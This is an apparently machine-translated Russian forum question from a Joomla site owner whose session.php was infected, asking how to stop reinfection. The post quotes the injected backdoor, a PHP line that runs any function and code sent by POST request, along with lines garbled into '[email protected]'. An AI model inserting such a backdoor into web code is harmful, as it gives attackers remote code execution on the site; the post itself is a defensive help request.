Один из наших веб-сайтов ежедневно выдавал ошибку 500 после проверки журнала ошибок, я обнаружил, что разрешения от файла в/home/cadactdi/public_html/libraries/joomla/session/session.php были изменены на 000.Joomla: Разрешения session.php изменились на 000 из-за вируса
Проверка на служебном порту 80, я обнаружил, что файл сеанса был заражен каким-то вирусом, но не было никаких подробностей о его очистке.
Итак, поскольку обновление не было вариантом, я менял каждый день свои права, но они вернулись к 000 на следующий день.
Я прочитал файл сессии, и я нашел следующий кусок кода в начале файла:
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"][email protected]_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"][email protected]_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
if(isset($_POST["php_code"])){@$_POST["php_func"](stripslashes($_POST["php_code"]));};
if(isset($_SERVER["HTTP_USER_AGENT"])){$_SERVER["HTTP_USER_AGENT"][email protected]_replace("/[^\w\-\.]+/is","_",$_SERVER["HTTP_USER_AGENT"]);}
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])){$_SERVER["HTTP_X_FORWARDED_FOR"][email protected]_replace("/[^\d\.]+/is","",$_SERVER["HTTP_X_FORWARDED_FOR"]);}
Так я удалил эти строки, и антивирусный сканер не нашел какие-либо угрозы на этот раз, и Я думаю, что это исправлено, однако я не уверен, что это произойдет снова, если какой-либо вирус может изменить этот файл и как его предотвратить.
У кого-то была такая же проблема? Каковы рекомендации?
Благодарим за помощь!
Большое вам спасибо! я проверяю его –